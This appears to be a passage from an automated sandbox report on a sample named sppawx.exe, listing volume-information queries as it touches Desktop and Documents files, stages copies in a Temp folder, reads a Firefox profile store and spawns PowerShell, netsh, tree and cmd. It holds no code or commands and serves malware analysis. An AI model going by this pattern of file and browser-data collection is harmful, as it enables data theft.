Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\MQAWXUYAIK.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\MQAWXUYAIK.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\PSAMNLJHZW.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\PSAMNLJHZW.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\PSAMNLJHZW.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\PSAMNLJHZW.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\PSAMNLJHZW.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\PSAMNLJHZW.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\PSAMNLJHZW.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\PSAMNLJHZW.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\QVTVNIBKSD.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\QVTVNIBKSD.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\QVTVNIBKSD.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\QVTVNIBKSD.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\TTCBKWZYOC.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\webappsstore.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\TTCBKWZYOC.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\TTCBKWZYOC.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\TTCBKWZYOC.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\XQACHMZIHU.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\XQACHMZIHU.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\XQACHMZIHU.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\XQACHMZIHU.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\XQACHMZIHU.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\XQACHMZIHU.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\XQACHMZIHU.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\XQACHMZIHU.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\ZSSZYEFYMU.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\ZSSZYEFYMU.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\ZSSZYEFYMU.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\ZSSZYEFYMU.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\ZSSZYEFYMU.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\ZSSZYEFYMU.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Documents\AFWAAFRXKO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Documents\AFWAAFRXKO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Documents\AFWAAFRXKO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Documents\AFWAAFRXKO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Documents\AFWAAFRXKO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Documents\AFWAAFRXKO.jpg VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
